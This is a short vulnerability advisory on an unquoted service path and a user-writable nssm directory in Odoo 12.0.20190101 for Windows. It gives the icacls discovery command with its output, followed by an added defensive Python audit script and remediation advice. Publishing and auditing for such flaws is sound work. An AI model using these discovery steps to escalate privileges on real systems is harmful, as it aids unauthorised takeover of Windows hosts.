Authored by 1F98D

Odoo version 12.0.20190101 suffers from an unquoted service path vulnerability.

# Exploit Title: Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path
# Exploit Author: 1F98D
# Vendor Homepage: https://www.odoo.com/
# Software Link: https://nightly.odoo.com/12.0/nightly/windows/odoo_12.0.20190101.exe
# Tested Version: 12.0.20190101
# Tested on OS: Windows
# Steps to discover Unquoted Service Path:

C:\> icacls "C:\Program Files (x86)\Odoo 12.0\nssm"

C:\Program Files (x86)\Odoo 12.0\nssm pc-1\user-1:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
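
Added example (not part of the original advisory, and not the author's or Odoo's code): a Python audit helper that parses `icacls` output like the listing above and reports principals outside a trusted set that hold write-capable rights, plus a check for unquoted service image paths that contain spaces. The trusted-principal list and the sample ImagePath are assumptions; the ACL sample is constructed from the listing above.

```python
import re

# Inheritance markers in icacls output; other parenthesised values are rights.
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# icacls rights codes that allow creating or changing files in a directory.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "GA", "GW", "WDAC", "WO"}
# Assumption: principals an auditor accepts as writers under Program Files.
TRUSTED = {"nt service\\trustedinstaller", "nt authority\\system",
           "builtin\\administrators", "creator owner"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<groups>(?:\([^)]*\))+)$")

def writable_by_untrusted(path, icacls_output):
    """Return sorted (principal, rights) pairs for untrusted writers."""
    findings = set()
    for line in icacls_output.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()  # first line is "<path> <first ACE>"
        m = ACE_RE.match(line)
        if not m:
            continue
        rights = set()
        for group in re.findall(r"\(([^)]*)\)", m["groups"]):
            rights |= {r for r in group.split(",") if r not in INHERIT_FLAGS}
        risky = rights & WRITE_RIGHTS
        if risky and m["who"].lower() not in TRUSTED:
            findings.add((m["who"], ",".join(sorted(risky))))
    return sorted(findings)

def is_unquoted_with_spaces(image_path):
    """True when a service ImagePath has a space in its executable path and no quotes."""
    p = image_path.strip()
    if p.startswith('"'):
        return False
    exe = re.match(r"(?i)^.*?\.exe", p)
    return bool(exe) and " " in exe.group(0)

# Constructed sample: ACL listing from this page, backslashes restored, shortened.
ODOO_DIR = r"C:\Program Files (x86)\Odoo 12.0\nssm"
SAMPLE = "\n".join([
    ODOO_DIR + r" pc-1\user-1:(OI)(CI)(M)",
    r"    NT AUTHORITY\SYSTEM:(I)(F)",
    r"    BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)",
    r"    BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)",
])

if __name__ == "__main__":
    print(writable_by_untrusted(ODOO_DIR, SAMPLE))
    print(is_unquoted_with_spaces(r"C:\Program Files\Example App\svc.exe run"))  # constructed path
```

A finding from either check is a remediation item: quote the service's ImagePath and remove Modify/Write rights for non-administrative principals on the service directory.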